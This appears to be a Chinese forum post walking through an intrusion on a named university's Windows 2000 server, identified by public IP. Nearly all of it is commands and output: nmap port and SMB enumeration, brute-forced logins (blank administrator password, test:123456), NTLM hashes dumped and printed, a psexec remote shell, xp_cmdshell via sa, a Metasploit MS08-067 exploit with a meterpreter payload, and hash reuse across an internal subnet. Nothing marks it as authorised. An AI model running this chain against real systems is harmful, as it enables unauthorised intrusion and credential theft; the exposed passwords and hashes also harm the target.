广西师范网站http://202.103.242.241/
1 k0 y; d3 R! p2 E/ k, X+ U5 o, ]( S Y5 K Q6 q, `8 o6 | V
root@bt:~# nmap -sS -sV 202.103.242.241
' [+ q& \0 x/ f5 I: z; \% m( e8 b4 c# r
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
* \0 D" f7 ~0 a- |% j1 A s7 ?& n7 O4 C g: s3 E
Nmap scan report for bogon (202.103.242.241); g/ c* V4 `" X8 P; U
& V# W' l+ P& v6 jHost is up (0.00048s latency).% z: A B4 o5 Z2 r! J) N) C
; O2 T7 Q- Z% P7 `0 _ T) n- g2 W- ENot shown: 993 closed ports2 [9 E2 g9 L/ J X# c
9 U1 k4 c& Y3 i/ hPORT STATE SERVICE VERSION
6 F6 {$ J! S) _# a9 y. O7 F2 I$ q2 h/ Q# ~0 [
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
/ z# B$ g0 y5 |' o) |7 W2 P4 W% ?- N9 ^7 p) c/ `; H
139/tcp open netbios-ssn/ Y: b |3 ~1 y2 Z/ g( B
* f" D; j1 k8 j% N6 v; j445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds' X$ ^- \. ^' v5 `# [3 }
, M9 g5 x6 F a2 S" x+ @7 S: E
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe). ?) x) {6 ]3 D! g6 W- [/ Q8 G
$ l( K; ^& O$ |) X* P y
1026/tcp open msrpc Microsoft Windows RPC% |& b [0 p2 u a N
1 a5 @' K8 P- ?' @, }3 d3372/tcp open msdtc?
. N7 R! }7 ?7 K" y+ O+ z* G
4 q$ E1 w, i# `$ Q9 M3389/tcp open ms-term-serv?
* u! l5 }% Q4 K% G* F. h6 i0 L3 A% a
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
5 f9 ?" s4 U/ ?& BSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
) S/ `. H$ R: C8 T- C# p ^8 `2 p# h* T4 c
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
9 b, l6 m, w0 a% L8 y: t% A0 K& w/ |
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)" A% Q$ V3 W. j# G' @* R
: z+ j. W+ O+ p( U- e" dSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO) m3 B( X3 e4 o( A9 [
' F% Q+ b" k) ?9 K D5 lSF:ptions,6,”hO\n\x000Z”);5 [/ ~5 O# Y% F
( p( E4 ?# E" F( E/ v' I+ @! A8 x SMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
* P' n: s! ? y$ x
' M3 [1 w P0 p/ V1 nService Info: OS: Windows6 C9 f7 i" S; L* w
+ E" T2 F8 x! w2 [Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .; E) U1 E8 d, M9 |0 o
3 _% [% `& @ @5 l( mNmap done: 1 IP address (1 host up) scanned in 79.12 seconds' j/ ~* d% ~9 A" s+ P
" Q( l# K# s2 h+ h u m; Groot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本5 ~0 P/ i. w( r7 x: x) V
! N! Z8 ]' ?2 L
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse- G, X7 o& C) f
6 X% z! M8 O5 a4 K-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
& p6 J5 n' e7 \0 }. v6 @! m; |/ e ?2 M% A
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
7 M5 D! V* j+ E4 M0 L. w- G
& z% _8 w3 H1 E7 O-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse* d. }1 b. h' Q* e" [6 a& F- @: M
4 f4 J1 t2 @. w4 P$ q% `6 u
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse2 K1 E. f6 I; z( d, e/ h/ s
7 j# t' a8 ^* O-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse; i" I; g! b6 f) k: [. |: j
+ p; G( G9 W+ T; O8 Q ? e-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse" h# l1 a* p) ? ?
- i5 c! M |2 K% w& c-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
# `; Z' R$ t& ?! m* R
* i' D# q4 h/ } {$ n-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse9 v1 o# y, F8 v1 s0 x, a: w4 }
9 |6 q T! @2 a- e-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
$ k# N3 i* C( D* M9 M9 I1 i4 u/ }: |& N& D# X: p0 O
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse; z H) x: s$ \+ O
' e) W7 T. E5 i3 |$ K6 _
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse6 ?, M- z/ b/ @- {% J
* q8 d u8 ]+ R
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse6 Q4 [5 S- e# S( k2 H" _
) K% l& ~" `+ F% t. R2 d
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
' n* V" f+ L4 N+ h9 |) Q: ~& {* E9 h$ s' W
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse/ R4 o: u8 a b" A+ Y- c
& @* f z/ h! a1 S5 vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 # e% w, a! i$ S. {0 \& W p& K
( b+ ^! M; e* T8 u! Q0 ~1 A
//此乃使用脚本扫描远程机器所存在的账户名
! ~0 m% f) H% G# f) R1 `6 M
: K- t2 B$ S6 t- T, D5 g4 a0 zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST& A) u6 j `7 o+ P2 e& `5 I' ~1 K( L
! M1 Z0 \" V0 W, b. y
Nmap scan report for bogon (202.103.242.241)
( G! w6 h% }3 ~; a
, x7 Z! a+ g' h* d% SHost is up (0.00038s latency).
9 }( K `$ M5 c; N8 c. o% P) }
; y& Q. ? _6 i- {- F: GNot shown: 993 closed ports. V7 y- H4 X1 d; u
5 K; c' [1 n* U% w ~6 @
PORT STATE SERVICE0 S% U2 ]; A' d; a1 d# D2 r
( o0 n8 t/ C" s; R" t135/tcp open msrpc
8 L1 b$ E" _ H7 F
5 e- N3 r1 D9 w( T1 h139/tcp open netbios-ssn* E$ h) R" P& R6 U0 S7 z7 F {
0 V! B/ r* t1 N) N2 V: |% K445/tcp open microsoft-ds4 t/ H5 P) n y0 @" K; X7 }2 [7 @! I
- b& V y' n3 Y8 g! Q1025/tcp open NFS-or-IIS- o! S/ M. d5 H
+ ~& ]3 f4 t) k9 y' N7 Z4 g* T& C& H1026/tcp open LSA-or-nterm
! @2 _5 M/ d" D" }3 X4 |' V& ], B/ ?. j) u$ o; M
3372/tcp open msdtc- l- K y: G3 ~
3 X$ S. T3 H3 R n& X3389/tcp open ms-term-serv
" Y6 E( U" ^% H
) U9 L7 M j5 YMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& E- Y: z7 }9 U4 R/ ^$ G3 e9 F4 X; W9 a7 N8 I8 q: V4 L
Host script results:/ n |) {, g' c/ a5 [! Z
+ h2 \% T C! D& Y% A5 k| smb-enum-users:
1 ?( w' | i6 Y# a; a- x1 G
$ g( T( d6 B* @& \# Q: a|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
4 Y2 y3 ?: |. ~3 |! Z* P* \& {7 b: X8 W3 V2 |& I4 _1 E2 B3 k- `5 u
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds4 Q8 x$ V" u- P- S' p6 C
' `$ f" U; e' `8 w1 K; f1 oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 : M3 L) h3 N' L0 x1 b# L
5 I" Y; s7 l( Y4 p0 I
//查看共享0 v$ S$ `( p7 v. l% D' ? H- y, z
" s. R1 F* J8 e1 nStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
5 g" u3 q5 p$ e5 e2 Y* J+ P9 T, j+ U' L+ s( t
Nmap scan report for bogon (202.103.242.241)
* n7 g0 H" S/ c+ u# S8 D, M
/ ~- J6 u7 F0 D+ v# O8 v7 W4 pHost is up (0.00035s latency).
/ K2 G7 T0 y* E6 _
z' B( o2 v3 c& VNot shown: 993 closed ports
5 u- N9 y- r- }5 `$ @3 [/ [2 K6 |9 Z% P4 f# h
PORT STATE SERVICE
5 n' W/ A0 L+ i$ g3 \; o' a( Z' A2 P' l# _; {4 ?+ \( B
135/tcp open msrpc
: a; M8 Q' T; ], Y! U% M# J3 W* k1 E7 i! F5 _1 L
139/tcp open netbios-ssn- s- E) S- f! m8 m7 n
: l* t r* z7 t7 J1 r9 J5 Q' w445/tcp open microsoft-ds, T7 h3 T1 b( Y3 r: k# M) |
2 Z: e1 J( X/ L3 t; ]# w- B A1025/tcp open NFS-or-IIS
( j4 E, z u7 D1 s F! D( `/ e' ^) @* S$ ?; M
1026/tcp open LSA-or-nterm1 A/ {* Q6 L' ~! L/ }$ L
8 k/ ^! B O! J3372/tcp open msdtc" P5 x4 Q: T1 m6 ?% `! t! d
; Y: d: d0 q& ]: _" `. e5 E: l* Q3389/tcp open ms-term-serv, [9 l8 Y" m3 s* r7 m6 y
3 A# Y! ]+ H) d: l. h' gMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& S6 v3 ]* Z7 ^/ ^0 r2 [$ i# L
, }- l7 F' Q, g- |
Host script results:- d+ p8 T7 c- Q# Q
7 F- |( a! f! G- B5 Y+ O9 S
| smb-enum-shares:
8 e# Q1 e; v# C- ? Y) X: i& p; F- W1 `0 v8 q! R" l8 o
| ADMIN$5 J" e) g, N* ?5 k; k9 s1 W
; [) y, S1 h9 v" B) Y5 w| Anonymous access: <none>
; a" e+ c. M& `( |2 Y2 H/ t) h7 I
# R6 a. n# ~+ _5 }7 q2 \5 ?| C$
$ }8 i( h# g1 _7 K- H3 G: o7 j8 g' Y0 M+ }/ X5 [' e1 i% W
| Anonymous access: <none>& E" `: U3 j- c. d( h; A1 E
( ^: M) E- `. u5 c {* d| IPC$+ o5 ?5 P# {% ] u
- y# S" k9 {# m% N! |5 a|_ Anonymous access: READ
" p- T$ y% S, [1 N v! J
1 t1 v# _3 ?" h5 [Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds4 R g5 }# J; s
: }( q% w" r R4 d0 F' H9 x
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
9 Q. H: d" u3 c" w/ |3 V& Q$ T; q4 s, _
//获取用户密码
9 p& j& `! t' _% n1 T
. t# J% g& v/ n/ L) ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
' `. h0 V' g/ _1 p2 {
9 o1 @% i7 Q* S. Y' tNmap scan report for bogon (202.103.242.2418)1 B& s, `1 L9 d% v4 g4 K
! h# d; _6 d1 ^ F+ X) I+ S$ j
Host is up (0.00041s latency).: i' O) I5 V* ^1 M6 x5 n+ y7 Q
* ?2 \& @# L d* ZNot shown: 993 closed ports
7 j& l+ p# [5 \# |* b- H9 t/ c7 ?# w. h+ S8 a
PORT STATE SERVICE
; o( e [* o& b" w6 Y9 ~% v9 G( `' q; M
% N9 O x3 ?; c135/tcp open msrpc5 z4 R9 \8 V# G1 O7 r- Z/ q
- A: q; O, z' C
139/tcp open netbios-ssn; M! Z4 A* t5 e. T% H
9 L5 V/ L: N! Q8 Q8 K7 e
445/tcp open microsoft-ds3 c( t: u) u( \4 `9 q* @
0 P! L" f5 ` m! D4 S" ]1025/tcp open NFS-or-IIS
# m* E% u8 P4 s! T5 ?2 v8 t; ~9 O" ? y" u! w( T: X2 h
1026/tcp open LSA-or-nterm
/ R- Q% D7 Q. b1 k! V% I5 g, V3 A7 {5 N, t* a
3372/tcp open msdtc1 A- J) B- q; C2 _4 @
. G) @6 Q& t8 @' R6 r9 ^3389/tcp open ms-term-serv" P0 G- L, g' ~
* F* k- }, o: f7 x. J& \
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ L6 [# S! Q; U& o J" \8 r7 f: O6 C4 |& _5 _7 v
Host script results:
; c/ @9 K; @" `: V2 V8 A/ N$ ^
! ?" @+ I Q5 Y+ D4 `3 A( c| smb-brute:& V( K5 W* ~! \: `
& ~3 b" B+ e$ l- ?: H/ u- G$ j2 Nadministrator:<blank> => Login was successful
$ \2 E$ {# G! f* h7 j4 _: ~" H2 J7 }# w1 ^1 c z8 s- R
|_ test:123456 => Login was successful. e4 U8 l- m; z2 h) T
D% p% I) L- E7 c% D0 k7 TNmap done: 1 IP address (1 host up) scanned in 28.22 seconds1 I9 s" l; J& q$ ~* M& U* g' Y
+ f S/ w8 v- Y% Jroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
) x- e9 h2 w( s W
4 V( Q" w. @/ |& croot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data$ ^% w0 x! f6 R: P% I) M% V0 E
) t- Z* ?" m) T
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
5 w* y. d9 [, {" A* l7 i
* T9 H& y* y; e( _7 H Groot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139' y: o' G* Q7 O4 v
5 Q* E6 {# n- w% m6 N! G+ X9 }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST8 ^3 H! k0 i. y1 f2 Q* x
- d3 J$ a% a6 |' o G
Nmap scan report for bogon (202.103.242.241)
( {% R7 ~& G* D+ O( B8 E# V; ]2 z; v$ U6 o
Host is up (0.0012s latency).0 J. z7 y0 D, `9 w# i. u: z
! I$ h9 p+ T2 A& J
PORT STATE SERVICE
( M" i, m# u5 P
/ D0 B7 J$ y8 r: j2 j4 |" ~135/tcp open msrpc
2 v- ]# ]5 V- C- m4 S* P
$ i- E+ A& E3 J1 G139/tcp open netbios-ssn" F8 g; z4 w6 C: r; p' _1 s
2 g/ r; }3 p5 z445/tcp open microsoft-ds
) l8 k1 t2 i2 [6 m7 l& X( Y5 w2 N4 {# w9 e5 t7 W: @5 m9 F1 W: ^
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 q) m+ L- |, ^5 L$ O2 w5 s R+ Z3 Q) [( }& G
Host script results:
) z) b! M: M$ A+ [$ L" l' j: N, G* A6 p; m! Z, x2 [
| smb-pwdump:5 {8 L% R8 c1 W2 K
6 F' w+ v) p# t5 ] M| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************9 `2 P9 k% Z9 f# a) @% {
- D5 K1 e7 c) P- b1 c
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
1 c$ i% o/ z1 X' f
( f3 x6 ~. M3 v| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D48 \% Q o! W: {6 w/ v0 m
' w8 b V+ _& N5 } [- ~
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
4 a* Z$ U6 N' ]
" l. b- a/ `, l p$ u# p$ i8 wNmap done: 1 IP address (1 host up) scanned in 1.85 seconds( B/ a4 S; w9 v# [) i/ u2 s
9 t1 E* J: r7 I5 GC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell/ q7 b& y1 J* C2 M
; ?3 ~% ^/ Z, ?! W
-p 123456 -e cmd.exe: b, }9 L1 i4 F2 I
4 d; C& @2 V' \! F6 v$ C6 ]
PsExec v1.55 – Execute processes remotely
6 Y# h$ T: P+ y8 _ ^ p, h1 q* W% u$ t9 |* ~* ?8 N
Copyright (C) 2001-2004 Mark Russinovich" H, o: b; y! b
3 W3 f4 F9 g1 S' ^. G0 s2 Q
Sysinternals – www.sysinternals.com! K) u. X7 ?0 {4 L' T6 _
9 I) F$ C o+ tMicrosoft Windows 2000 [Version 5.00.2195]
7 w# _, s1 Q- J7 w$ q2 F& s" E, z
) c, b+ E/ U' f& h1 B" F& O(C) 版权所有 1985-2000 Microsoft Corp.9 v7 p# ]' @8 B; B( I. l8 l. y
- r$ ~6 I, I3 N3 \& b) [
C:\WINNT\system32>ipconfig v# [! l) R$ N, @! N* [# |3 D- K
1 ~: _9 V. v: T8 L' d$ Y6 ]Windows 2000 IP Configuration
: B6 {8 M. s7 G# @. e
+ a2 ?% t0 g; k/ C2 xEthernet adapter 本地连接:$ A$ T5 Y, l7 C+ d" M+ [' L* P
; ]/ b @; {; F% @. A5 W) a
Connection-specific DNS Suffix . :
6 O, W; u: i# ?: ` T' _& o' l; \" [" k
IP Address. . . . . . . . . . . . : 202.103.242.241
) t' l- k& x+ d0 \- I0 ]/ n4 j1 {7 V6 r# ^. I( g. ^
Subnet Mask . . . . . . . . . . . : 255.255.255.0 e1 l2 z2 |9 d) y) p
6 M) ~( g! u( U& RDefault Gateway . . . . . . . . . : 202.103.1.1
; z) y3 q" K7 c
$ W& u. h6 M/ N7 s+ A( ^% h8 cC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
7 {4 h$ f; c" |& x$ l
1 S. z; [9 @2 C$ a2 w5 d" }root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
0 ^1 t5 I# ?* d- @6 ~9 ?, K
. x3 ]' H/ c+ B6 wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST) P* Y0 a2 ?, a: m$ e' a( ~, ]; j
8 ~+ {; H" s1 N4 H4 ~ yNmap scan report for bogon (202.103.242.241)6 P' z/ L. r5 c$ h2 q# [, Q
; J5 T2 |9 T" N6 _& ?
Host is up (0.00046s latency).# m7 \2 c( M4 a
& t0 |7 q6 d4 f( t# W. R5 gNot shown: 993 closed ports5 V" h+ l4 ~4 r0 E4 D5 F6 N* R
( Y) c8 x# I1 F) L; u$ e8 \
PORT STATE SERVICE, Q, ]# Y8 a9 m) a1 H
4 K7 W/ n2 r4 o( A) p135/tcp open msrpc
& O" r" x1 B, U$ D) w! {0 }/ u- K+ A# _
139/tcp open netbios-ssn
: V f& v# z! W' o5 Q m
6 \/ e1 R7 T- s3 @* \' p445/tcp open microsoft-ds
: @8 h% f' M, O9 v+ y% @
; x/ m5 p. N X/ I- r- b# P& s1025/tcp open NFS-or-IIS* w' H/ Q( h5 [/ ^! z
G! ]% ^$ f. r* h. Y/ x4 W1026/tcp open LSA-or-nterm
, v6 f6 T- D9 M- y$ U# X8 `
" O7 r. I6 k5 f+ [$ u3372/tcp open msdtc
0 | P7 a" N& T0 K* R. {) v3 T/ S) E; k, n
3389/tcp open ms-term-serv
" ^. C+ I2 R; \
0 e: U2 r# {4 G2 t: w; SMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, q; J- G6 p) t+ v+ M3 _2 U$ A
" S* u2 v7 `2 L1 [+ nHost script results:
0 I" D& l. ^5 u6 E7 ~; d
p. `; D: I* G; N| smb-check-vulns:
4 s# T) T* n2 Z6 \( F+ f0 J1 P6 y; {. D" S7 Z# O
|_ MS08-067: VULNERABLE
& H: _! H# g# t& ^5 u" \' B/ O* x# @' u( v2 Y" o: N
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds# O. r3 @* x, i6 p9 i
' V3 T) E% l$ ?/ u4 ?: S/ X
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出5 i% n* R, D* Q
$ s% p8 s U: A9 p6 z$ f
msf > search ms085 p5 [8 n6 v4 |3 P7 w) F0 x
9 ]5 z; c9 R0 Z z6 z4 |) Cmsf > use exploit/windows/smb/ms08_067_netapi
2 g& F; v3 B2 S0 |! H0 H S C7 m( h8 z" G+ J" C$ `- ? M
msf exploit(ms08_067_netapi) > show options
1 V1 c w6 J: K: N0 ]% O" s
& R5 x+ M2 `: k2 ]% [% B8 U6 O6 Q3 Nmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
/ E' N5 v7 w( }; x" |, |
. B* _) `5 D7 k2 E% ]+ E( Omsf exploit(ms08_067_netapi) > show payloads
* S& R: G' }/ {: }' M# c# K( y! D; o0 i5 Z2 Y+ L- S
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp D8 i4 U; p5 W$ k- g, ^
% S a" n- y; A4 @1 G8 x
msf exploit(ms08_067_netapi) > exploit' T4 R0 @' ~; h; t! f" M
) |" A3 F! E$ T# f0 k- n4 ameterpreter >
1 U: E! e! B& O. s
" d% p& y: E* q: YBackground session 2? [y/N] (ctrl+z)6 Z) \! r m, _# `
d6 C% z0 @: ~4 e$ }
msf exploit(ms08_067_netapi) > sessions -l
$ [( X2 H6 T1 H& h6 b; S( u; K& L. N: V6 L' v
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
) R7 e7 X' i6 Y" w, G
, J5 @! U8 N$ E# |6 htest
" l* o$ N7 h* [. L
; w" x, i& j, sadministrator2 o5 M( Z- {8 [& l; D$ W
8 A; A5 ^3 k+ A; Q0 Kroot@bt:/usr/local/share/nmap/scripts# vim password.txt
9 T. I& ~4 `. {+ b6 ^! v: C
: H ^) G) g0 [; Q& C' }6 M6 z& @44EFCE164AB921CAAAD3B435B51404EE( _* U3 z& T5 b2 v4 e
' r/ S X5 I' w% ^& Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 3 U6 [7 E+ u+ I4 Y5 z0 X' h8 f* X
4 z9 |" o" z E2 C( `* |
//利用用户名跟获取的hash尝试对整段内网进行登录& ?; P+ c1 ]% u. U; G! k% w
* n' k8 e8 D( |1 x) Y! z
Nmap scan report for 192.168.1.105# T$ c$ m* n: s8 ]/ [2 V, C
* w) B' l9 e! L! u' T" s% b/ bHost is up (0.00088s latency)., u7 ]6 u- R$ _
+ o/ I1 j w) @ f4 C( s. }$ o2 O# UNot shown: 993 closed ports
. Q/ K& \" h/ F" v, H# n) Q, D
3 G; d; ~' o+ E7 I' t0 y* u/ lPORT STATE SERVICE( P+ w z9 ^5 h- r+ X
2 }) h8 ]. l8 l; Y& F/ k
135/tcp open msrpc: l1 c" L" X! U- m
" v% l! }9 v2 J6 z \139/tcp open netbios-ssn2 ^ @1 \/ R# k$ k% L, w
. Q' ]5 f0 V. x* I5 A* H
445/tcp open microsoft-ds
, e7 o2 l$ v2 a! w8 W9 R0 L; V5 H8 u: B3 h% {
1025/tcp open NFS-or-IIS
* q8 y5 M1 [$ q* v" i) ^3 H% Q4 G9 Q( f
1026/tcp open LSA-or-nterm/ k3 E* G& ?' O D9 J+ W( m
& h4 n+ @+ L9 X( ?& L
3372/tcp open msdtc
" k+ k4 G x3 Q# M. T, {3 j
' U, w5 P" N5 I5 W1 s0 p* u6 ]4 n3389/tcp open ms-term-serv- K' f9 S+ g- J
) W$ P6 y$ W7 _1 VMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) |4 T) j' N, Q- @) |
X4 H' K" g; q5 A( S8 W
Host script results:/ ]" P+ o% l0 {% h4 q- d
- C7 P# E. M$ [. q( F4 F' ]- K| smb-brute:$ z( h. \& @) F/ A! }5 a7 v$ v& G3 H
. }5 @) N2 K5 c+ m# S
|_ administrator:<blank> => Login was successful
) f( {, S* h8 d/ n S; A1 U5 u$ l
* w A; m& I1 e ^+ p! r攻击成功,一个简单的msf+nmap攻击~~· {/ u8 ^. r( U0 k+ m$ C" q
/ R3 M/ T/ R% K+ P: T' Z8 G
|
发表于 2012-12-4 12:46:42
收藏
支持
反对